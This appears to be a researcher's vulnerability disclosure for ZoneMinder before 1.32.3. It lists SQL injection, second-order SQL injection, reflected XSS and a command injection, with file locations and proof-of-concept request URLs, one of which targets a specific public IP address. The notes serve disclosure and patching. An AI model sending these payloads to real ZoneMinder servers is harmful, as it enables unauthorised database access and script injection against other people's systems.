zoneminder vul before v1.32.3
标签(空格分隔): 0day
The following vulnerability information comes from the zoneminder release version is probably 1.32.0, the code structure has changed in 1.32.3, some of the code has changed, but the following vulnerabilities have not been fixed, need to find in 1.32.3 Corresponding code location and not absolutely the following description location
The progress of these vulnerabilities ZoneMinder/zoneminder#2399 is constantly being updated.
skins/classic/views/events.php line 44 sql injection
skins/classic/views/events.php line 44
parameter $_REQUEST['filter'] from function parseFilter
includes/functions.php line 1401 parameter sql come from $filter['terms'][$i]['cnj'] or $filter['terms'][$i]['obr']
in 1.32.3,This part of the variable is changed to $terms[$i]['cnj'] and the terms are from $filter['Query']['terms'] in line 1035
in the above figure parameter countSql or eventsSql can be injected
poc in 1.32.3
index.php?view=events&page=1&filter[Query][terms][0][attr]=MonitorId&filter[Query][terms][0][op]=%3D&filter[Query][terms][0][val]=1&filter[Query][terms][0][cnj]=1%2b1)and%20sleep(3)%23
The following information is the same, you need to adapt the corresponding version.
sql query error Reflected xss
when sql query error, sql error and message will be displayed without any validated, sanitised or output encoded.
includes/database.php line 120
if sql query without any validated, sanitised or output encoded and can be modifyed, it will lead to xss vulnerability.
https://95.143.216.108/zm/index.php?view=events&page=1&filter[terms][0][attr]=MonitorId&filter[terms][0][op]=%3D&filter[terms][0][val]=1&filter[terms][0][cnj]=1432%3Cimg/src=/%20onerror=alert`1`%3E
skins/classic/views/control.php line 35 second order sqli
control.php line 35
parameter $groupSql is detected from the database and directly spliced into the sql query statement.
from includes/action.php line 748 $monitors insert into database
first insert evil statement into database and select it to sql injection
poc
Step1:
index.php?action=group
newGroup[MonitorIds][]=1&newGroup[MonitorIds][]=2') or sleep(3)#&newGroup[Name]=132
Step2:
http://127.0.0.1/zoneminder/www/?view=control&mid=1&group={groupid}
skins/classic/views/controlcap.php Reflected xss
Most of the variables below controlcap.php are not filtered. This variable is passed directly from the mid.
poc
?view=controlcap&newControl[MinTiltRange]=2333%22/%3E%3Cimg/src=/%20onerror=alert(1)%3E
includes/functions.php daemonControl command injection
ajax/status.php line 276 orderby sql injection
poc
http://127.0.0.1/zoneminder/www/?request=status&entity=monitor&element=id&id=1&sort=123
ajax/status.php line 393 sql injection
there is two sql injection in ajax/status.php line 393 and line 406
includes/functions.php line 1401 parameter sql come from $filter['terms'][$i]['cnj'] or $filter['terms'][$i]['obr']
index.php?request=status&entity=nearevents&element=id&id=13&layout=text&filter[Query][terms][0][cnj]=233)%20||1=1%23
















